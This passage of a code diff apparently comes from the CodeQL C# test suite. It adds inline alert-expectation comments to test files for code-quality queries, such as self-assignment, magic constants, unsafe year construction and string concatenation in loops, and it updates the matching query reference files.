@@ -70,17 +70,17 @@ public void OK(SelfAssigns obj, int x) public void NotOK(SelfAssigns obj, int y) { - this[4] = this[4]; - y = y; - obj.y = obj.y; - z = this.z; - this.z = z; - obj.Normal1 = obj.Normal1; - obj.Normal2 = obj.Normal2; - base.IntField = IntField; - this.BoolProp = base.BoolProp; - this.Self.Self.Self.StringProp = Self.Self.Self.StringProp; - intArray[1] = this.intArray[1 + 0]; + this[4] = this[4]; // $ Alert + y = y; // $ Alert + obj.y = obj.y; // $ Alert + z = this.z; // $ Alert + this.z = z; // $ Alert + obj.Normal1 = obj.Normal1; // $ Alert + obj.Normal2 = obj.Normal2; // $ Alert + base.IntField = IntField; // $ Alert + this.BoolProp = base.BoolProp; // $ Alert + this.Self.Self.Self.StringProp = Self.Self.Self.StringProp; // $ Alert + intArray[1] = this.intArray[1 + 0]; // $ Alert } enum Enum diff --git a/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.cs b/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.cs index 244a6b2fd156..2c2d20b2bb2d 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.cs @@ -12,7 +12,7 @@ static StaticFields() StaticFields() { - staticField = 0; // BAD + staticField = 0; // BAD // $ Alert instanceField = 0; // OK } @@ -23,7 +23,7 @@ static void StaticTest() void InstanceTest() { - staticField = 0; // BAD + staticField = 0; // BAD // $ Alert instanceField = 0; // OK } @@ -40,7 +40,7 @@ object Prop { get { - return backingField ?? (backingField = new object()); // BAD + return backingField ?? (backingField = new object()); // BAD // $ Alert } } } 
diff --git a/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.qlref b/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.qlref index 6c3a7cc48249..62a3ba9ac281 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/StaticFieldWrittenByInstance/StaticFieldWrittenByInstance.qlref @@ -1 +1,2 @@ -Likely Bugs/StaticFieldWrittenByInstance.ql +query: Likely Bugs/StaticFieldWrittenByInstance.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBufferCharInit.qlref b/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBufferCharInit.qlref index 8d6feb01896b..10a4fb9ee8e3 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBufferCharInit.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBufferCharInit.qlref @@ -1 +1,2 @@ -Likely Bugs/StringBuilderCharInit.ql \ No newline at end of file +query: Likely Bugs/StringBuilderCharInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBuilderCharInit.cs b/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBuilderCharInit.cs index 256199df1776..8a423244af48 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBuilderCharInit.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/StringBuilderCharInit/StringBuilderCharInit.cs 
@@ -6,14 +6,14 @@ static void Main() { new StringBuilder(); new StringBuilder(12); - new StringBuilder('a'); // BAD + new StringBuilder('a'); // BAD // $ Alert new StringBuilder(3, 4); - new StringBuilder(3, 'a'); // BAD - new StringBuilder('a', 'b'); // BAD + new StringBuilder(3, 'a'); // BAD // $ Alert + new StringBuilder('a', 'b'); // BAD // $ Alert new StringBuilder(""); new StringBuilder("", 12); - new StringBuilder("", 'a'); // BAD + new StringBuilder("", 'a'); // BAD // $ Alert new StringBuilder("abc", 1, 1, 12); - new StringBuilder("abc", 1, 1, 'a'); // BAD + new StringBuilder("abc", 1, 1, 'a'); // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.cs b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.cs index e886518dcdf1..9cf42b90263b 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.cs @@ -37,12 +37,12 @@ public ListNonStatic() /// public class Nest03 { - private static readonly Nest01 _n = new Nest01(); + private static readonly Nest01 _n = new Nest01(); // $ Alert } public class Nest04 { - static ListNonStatic _list = new ListNonStatic(); + static ListNonStatic _list = new ListNonStatic(); // $ Alert } public static class StaticMemberChildUsage @@ -53,7 +53,7 @@ public enum DigestAlgorithm SHA256, } - private static readonly IDictionary HashMap = new Dictionary + private static readonly IDictionary HashMap = new Dictionary // $ Alert { { DigestAlgorithm.SHA1, SHA1.Create() }, { DigestAlgorithm.SHA256, SHA256.Create() }, 
@@ -62,12 +62,12 @@ public enum DigestAlgorithm public class StaticMember { - private static SHA1 _sha1 = SHA1.Create(); + private static SHA1 _sha1 = SHA1.Create(); // $ Alert } public class IndirectStatic2 { - static Nest02 _n = new Nest02(); + static Nest02 _n = new Nest02(); // $ Alert } /// diff --git a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.qlref b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.qlref index e247961a538d..7a9c70237578 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.qlref @@ -1 +1,2 @@ -Likely Bugs/ThreadUnsafeICryptoTransform.ql \ No newline at end of file +query: Likely Bugs/ThreadUnsafeICryptoTransform.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.cs b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.cs index f62c25025fc2..83018409f5cf 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.cs @@ -23,7 +23,7 @@ public static void Run(int max) // BUG expected var threads = Enumerable.Range(0, threadCount) - .Select(_ => new ThreadStart(start)) + .Select(_ => new ThreadStart(start)) // $ Alert .Select(x => new Thread(x)) .ToList(); foreach (var t in threads) t.Start(); 
@@ -85,7 +85,7 @@ public static void Run(int max) } }; var threads = Enumerable.Range(0, threadCount) - .Select(_ => new ThreadStart(start)) + .Select(_ => new ThreadStart(start)) // $ Alert .Select(x => new Thread(x)) .ToList(); foreach (var t in threads) t.Start(); @@ -143,12 +143,12 @@ public static void Run() { var bytes = new byte[4]; Convert.ToBase64String(sha1.ComputeHash(bytes)); - }, + }, // $ Alert () => { var bytes = new byte[4]; Convert.ToBase64String(sha1.ComputeHash(bytes)); - } + } // $ Alert ); } diff --git a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.qlref b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.qlref index 0a869270c9ba..f206d84cd77e 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.qlref @@ -1 +1,2 @@ -Likely Bugs/ThreadUnsafeICryptoTransformLambda.ql \ No newline at end of file +query: Likely Bugs/ThreadUnsafeICryptoTransformLambda.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.cs b/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.cs index 31e2336d0ca3..346dcc94c070 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.cs @@ -4,6 +4,6 @@ public class Test public override bool Equals(object other) { - return ((Test)other).Field == this.Field; + return ((Test)other).Field == this.Field; // $ Alert } } 
diff --git a/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.qlref b/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.qlref index 4fc0cc8938f5..fa38710c7511 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.qlref @@ -1 +1,2 @@ -Likely Bugs/UncheckedCastInEquals.ql \ No newline at end of file +query: Likely Bugs/UncheckedCastInEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/Program.cs b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/Program.cs index b7b6b4d4e3a6..83c18ca52763 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/Program.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/Program.cs @@ -10,11 +10,11 @@ public PipelineProperties() { var now = DateTime.UtcNow; // BAD - this.Start = new DateTime(now.Year - 1, now.Month, now.Day, 0, 0, 0, DateTimeKind.Utc); + this.Start = new DateTime(now.Year - 1, now.Month, now.Day, 0, 0, 0, DateTimeKind.Utc); // $ Alert - var endYear = now.Year + 1; + var endYear = now.Year + 1; // $ Source // BAD - this.End = new DateTime(endYear, now.Month, now.Day, 0, 0, 1, DateTimeKind.Utc); + this.End = new DateTime(endYear, now.Month, now.Day, 0, 0, 1, DateTimeKind.Utc); // $ Alert // GOOD this.Start = now.AddYears(-1).Date; 
@@ -23,14 +23,14 @@ public PipelineProperties() private void Test(int year, int month, int day) { // BAD (arithmetic operation from StartTest) - this.Start = new DateTime(year, month, day); + this.Start = new DateTime(year, month, day); // $ Alert } public void StartTest() { var now = DateTime.UtcNow; // flows into Test (source for bug) - Test(now.Year - 1, now.Month, now.Day); + Test(now.Year - 1, now.Month, now.Day); // $ Source } public void StartTestFP() diff --git a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected index 72846a3bea12..60f88d172588 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected +++ b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected 
@@ -1,3 +1,7 @@ +#select +| Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:13:39:13:50 | ... - ... | arithmetic operation | +| Program.cs:17:37:17:43 | access to local variable endYear | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:15:27:15:38 | ... + ... : Int32 | arithmetic operation | +| Program.cs:26:39:26:42 | access to parameter year | Program.cs:33:18:33:29 | ... - ... : Int32 | Program.cs:26:39:26:42 | access to parameter year | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:33:18:33:29 | ... - ... : Int32 | arithmetic operation | edges | Program.cs:15:17:15:23 | access to local variable endYear : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | provenance | | | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:15:17:15:23 | access to local variable endYear : Int32 | provenance | | 
@@ -12,7 +16,3 @@ nodes | Program.cs:26:39:26:42 | access to parameter year | semmle.label | access to parameter year | | Program.cs:33:18:33:29 | ... - ... : Int32 | semmle.label | ... - ... : Int32 | subpaths -#select -| Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:13:39:13:50 | ... - ... | arithmetic operation | -| Program.cs:17:37:17:43 | access to local variable endYear | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:15:27:15:38 | ... + ... : Int32 | arithmetic operation | -| Program.cs:26:39:26:42 | access to parameter year | Program.cs:33:18:33:29 | ... - ... : Int32 | Program.cs:26:39:26:42 | access to parameter year | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:33:18:33:29 | ... - ... : Int32 | arithmetic operation | diff --git a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.qlref b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.qlref index 37fd40fb036c..8eebe63939d1 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.qlref @@ -1 +1,2 @@ -Likely Bugs/LeapYear/UnsafeYearConstruction.ql \ No newline at end of file +query: Likely Bugs/LeapYear/UnsafeYearConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.cs b/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.cs index fe5617c228a1..5bd7f5dcec08 100644 --- a/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.cs +++ b/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.cs @@ -11,7 +11,7 @@ public void M1(List animals) { Dog d = (Dog)a; d.Woof(); - } + } // $ Alert } public void M2(NonEnumerableClass nec) @@ -31,7 +31,7 @@ public void M3(Animal[] animals) { Dog d = (Dog)animal; d.Woof(); - } + } // $ Alert } public void M4(Array animals) @@ -41,7 +41,7 @@ public void M4(Array animals) { Dog d = (Dog)animal; d.Woof(); - } + } // $ Alert } public void M5(IEnumerable animals) @@ -51,7 +51,7 @@ public void M5(IEnumerable animals) { Dog d = (Dog)animal; d.Woof(); - } + } // $ Alert } public class NonEnumerableClass diff --git a/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.qlref b/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.qlref index 8d70f9995033..3731b64605f5 100644 --- a/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.qlref +++ b/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.qlref @@ -1 +1,2 @@ -Linq/MissedCastOpportunity.ql +query: Linq/MissedCastOpportunity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.cs b/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.cs index d1326c70ee23..0fee1e9c48ff 100644 --- a/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.cs +++ b/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.cs 
@@ -13,7 +13,7 @@ public void M1(List lst) continue; Console.WriteLine(i); Console.WriteLine((i / 2)); - } + } // $ Alert // BAD: Can be replaced with lst.Where(e => e % 2 == 0) foreach (int i in lst) @@ -23,7 +23,7 @@ public void M1(List lst) Console.WriteLine(i); Console.WriteLine((i / 2)); } - } + } // $ Alert } public void M2(NonEnumerableClass nec) @@ -49,7 +49,7 @@ public void M3(int[] arr) Console.WriteLine(n); Console.WriteLine((n / 2)); } - } + } // $ Alert } public void M4(Array arr) @@ -73,7 +73,7 @@ public void M5(IEnumerable elements) { Console.WriteLine(element); } - } + } // $ Alert } public class NonEnumerableClass diff --git a/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.qlref b/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.qlref index 4a08b459a6c3..815371aba99c 100644 --- a/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.qlref +++ b/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.qlref @@ -1 +1,2 @@ -Linq/MissedWhereOpportunity.ql +query: Linq/MissedWhereOpportunity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/MagicConstants/AttributeInts.cs b/csharp/ql/test/query-tests/MagicConstants/AttributeInts.cs index 370dc0a948f2..441525751b80 100644 --- a/csharp/ql/test/query-tests/MagicConstants/AttributeInts.cs +++ b/csharp/ql/test/query-tests/MagicConstants/AttributeInts.cs @@ -20,7 +20,7 @@ void f1() void f2() { // BAD - var x = 555 + + var x = 555 + // $ Alert[cs/magic-number] 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555; } diff --git a/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.cs b/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.cs index 5dd81b335f71..4100d12f93fc 100644 --- a/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.cs 
+++ b/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.cs @@ -3,7 +3,7 @@ class MyClass { public static void Main() { - System.Console.WriteLine("Hello, World!"); + System.Console.WriteLine("Hello, World!"); // $ Alert[cs/magic-string] System.Console.WriteLine("Hello, World!"); System.Console.WriteLine("Hello, World!"); System.Console.WriteLine("Hello, World!"); diff --git a/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.qlref b/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.qlref index c471ffedda83..7b0fd125d426 100644 --- a/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.qlref +++ b/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.qlref @@ -1 +1,2 @@ -Bad Practices/Magic Constants/MagicConstantsString.ql \ No newline at end of file +query: Bad Practices/Magic Constants/MagicConstantsString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/MagicConstants/HashCode.cs b/csharp/ql/test/query-tests/MagicConstants/HashCode.cs index 71308f8fb6c6..7767fa6499db 100644 --- a/csharp/ql/test/query-tests/MagicConstants/HashCode.cs +++ b/csharp/ql/test/query-tests/MagicConstants/HashCode.cs @@ -13,7 +13,7 @@ int NotHashCode() { // BAD: Number 391 is repeated. return - 391 + + 391 + // $ Alert[cs/magic-number] 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 397; } diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicConstantsNumbers.qlref b/csharp/ql/test/query-tests/MagicConstants/MagicConstantsNumbers.qlref index 8047296eeeba..514381dce917 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicConstantsNumbers.qlref +++ b/csharp/ql/test/query-tests/MagicConstants/MagicConstantsNumbers.qlref 
@@ -1 +1,2 @@ -Bad Practices/Magic Constants/MagicConstantsNumbers.ql \ No newline at end of file +query: Bad Practices/Magic Constants/MagicConstantsNumbers.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.cs b/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.cs index 35f1bbb1435a..039ac137dda2 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.cs +++ b/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.cs @@ -16,12 +16,12 @@ class UseConstantNumber byte[] values2 = { 241 }; // BAD: Use constant - int values3 = 241; + int values3 = 241; // $ Alert[cs/use-number-constant] void Test() { // BAD: Use constant - var v1 = 241; + var v1 = 241; // $ Alert[cs/use-number-constant] // GOOD: Constant used var v2 = IntConstants.PUBLIC_CONST; diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.qlref b/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.qlref index 65c1a785c6cf..75437932f589 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.qlref +++ b/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.qlref @@ -1 +1,2 @@ -Bad Practices/Magic Constants/MagicNumbersUseConstant.ql \ No newline at end of file +query: Bad Practices/Magic Constants/MagicNumbersUseConstant.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.cs b/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.cs index c0b0fc8189c6..a09bf27c8d9a 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.cs +++ b/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.cs 
@@ -14,12 +14,12 @@ class UseConstantString string[] values1 = { "abcdefgh" }; // BAD: Use constant - string values2 = "abcdefgh"; + string values2 = "abcdefgh"; // $ Alert[cs/use-string-constant] void Test() { // BAD: Use constant - var v1 = "abcdefgh"; + var v1 = "abcdefgh"; // $ Alert[cs/use-string-constant] // GOOD: Constant used. var v2 = StringConstants.PUBLIC_CONSTANT; diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.qlref b/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.qlref index 72b6dcbab7d4..7ded4ffe161b 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.qlref +++ b/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.qlref @@ -1 +1,2 @@ -Bad Practices/Magic Constants/MagicStringsUseConstant.ql \ No newline at end of file +query: Bad Practices/Magic Constants/MagicStringsUseConstant.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Metrics/Files/FLinesOfCommentedCode/flinesofcommentedcode.qlref b/csharp/ql/test/query-tests/Metrics/Files/FLinesOfCommentedCode/flinesofcommentedcode.qlref index 85a80a9627eb..952183500693 100644 --- a/csharp/ql/test/query-tests/Metrics/Files/FLinesOfCommentedCode/flinesofcommentedcode.qlref +++ b/csharp/ql/test/query-tests/Metrics/Files/FLinesOfCommentedCode/flinesofcommentedcode.qlref @@ -1 +1 @@ -Metrics/Files/FLinesOfCommentedCode.ql \ No newline at end of file +query: Metrics/Files/FLinesOfCommentedCode.ql diff --git a/csharp/ql/test/query-tests/Metrics/RefTypes/TNumberOfFields/EnumSize.qlref b/csharp/ql/test/query-tests/Metrics/RefTypes/TNumberOfFields/EnumSize.qlref index c20a0d3886c1..67b897b1f5dc 100644 --- a/csharp/ql/test/query-tests/Metrics/RefTypes/TNumberOfFields/EnumSize.qlref +++ b/csharp/ql/test/query-tests/Metrics/RefTypes/TNumberOfFields/EnumSize.qlref 
@@ -1 +1 @@ -Metrics/RefTypes/TNumberOfFields.ql \ No newline at end of file +query: Metrics/RefTypes/TNumberOfFields.ql diff --git a/csharp/ql/test/query-tests/Metrics/Summaries/LinesOfCode.qlref b/csharp/ql/test/query-tests/Metrics/Summaries/LinesOfCode.qlref index 8c18065043fd..7510037b8101 100644 --- a/csharp/ql/test/query-tests/Metrics/Summaries/LinesOfCode.qlref +++ b/csharp/ql/test/query-tests/Metrics/Summaries/LinesOfCode.qlref @@ -1 +1 @@ -Metrics/Summaries/LinesOfCode.ql \ No newline at end of file +query: Metrics/Summaries/LinesOfCode.ql diff --git a/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.cs b/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.cs index 63b8d5b386eb..7d993b6b432a 100644 --- a/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.cs +++ b/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.cs @@ -7,7 +7,7 @@ static void Main(string[] args) { foreach (var arg in args) { - var sb = new StringBuilder(); // BAD: Creation in loop + var sb = new StringBuilder(); // BAD: Creation in loop // $ Alert sb.Append("Hello ").Append(arg); Console.WriteLine(sb); } @@ -33,7 +33,7 @@ void ControlFlow(string[] args) sb = new StringBuilder(); // GOOD: Not in all control paths else sb.Clear(); - lock (sb) sb = new StringBuilder(); // BAD: In all control paths + lock (sb) sb = new StringBuilder(); // BAD: In all control paths // $ Alert sb.Append("Hello ").Append(arg); Console.WriteLine(sb); } diff --git a/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.qlref b/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.qlref index 3b5d707f51e6..8b8d7b8e147b 100644 --- a/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.qlref +++ b/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.qlref 
@@ -1 +1,2 @@ -Performance/StringBuilderInLoop.ql \ No newline at end of file +query: Performance/StringBuilderInLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.cs b/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.cs index 4947363a083c..f37df5a73ccb 100644 --- a/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.cs +++ b/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.cs @@ -10,8 +10,8 @@ public Program() var x1 = ""; for (var i = 0; i < 1000; i++) { - x0 += "" + i; // BAD - x1 = x1 + i; // BAD + x0 += "" + i; // BAD // $ Alert + x1 = x1 + i; // BAD // $ Alert var x2 = ""; x2 += x1; // GOOD } diff --git a/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.qlref b/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.qlref index edd774f1e609..302e7fefd8a6 100644 --- a/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.qlref +++ b/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.qlref @@ -1 +1,2 @@ -Performance/StringConcatenationInLoop.ql \ No newline at end of file +query: Performance/StringConcatenationInLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.cs b/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.cs index 296ffaa82f27..9f39c43926e2 100644 --- a/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.cs +++ b/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.cs 
@@ -16,24 +16,24 @@ static void Main(string[] args) dict.TryGetValue(2, out x); // These are BAD - if (dict.ContainsKey(1)) x = dict[1]; - if (dict.ContainsKey(1) && dict[1] == 2) ; - if (!dict.ContainsKey(1) && dict[1] == 2) ; - if (!dict.ContainsKey(1) || dict[1] == 2) ; - if (dict.ContainsKey(1) || dict[1] == 2) ; + if (dict.ContainsKey(1)) x = dict[1]; // $ Alert + if (dict.ContainsKey(1) && dict[1] == 2) ; // $ Alert + if (!dict.ContainsKey(1) && dict[1] == 2) ; // $ Alert + if (!dict.ContainsKey(1) || dict[1] == 2) ; // $ Alert + if (dict.ContainsKey(1) || dict[1] == 2) ; // $ Alert - if (dict.ContainsKey(1)) + if (dict.ContainsKey(1)) // $ Alert x = dict[1]; else x = dict[1]; - if (!dict.ContainsKey(1)) + if (!dict.ContainsKey(1)) // $ Alert x = dict[1]; else x = dict[1]; - x = dict.ContainsKey(1) ? dict[1] : dict[1]; - x = !dict.ContainsKey(1) ? dict[1] : dict[1]; - x = true && !dict.ContainsKey(1) ? dict[1] : dict[1]; + x = dict.ContainsKey(1) ? dict[1] : dict[1]; // $ Alert + x = !dict.ContainsKey(1) ? dict[1] : dict[1]; // $ Alert + x = true && !dict.ContainsKey(1) ? 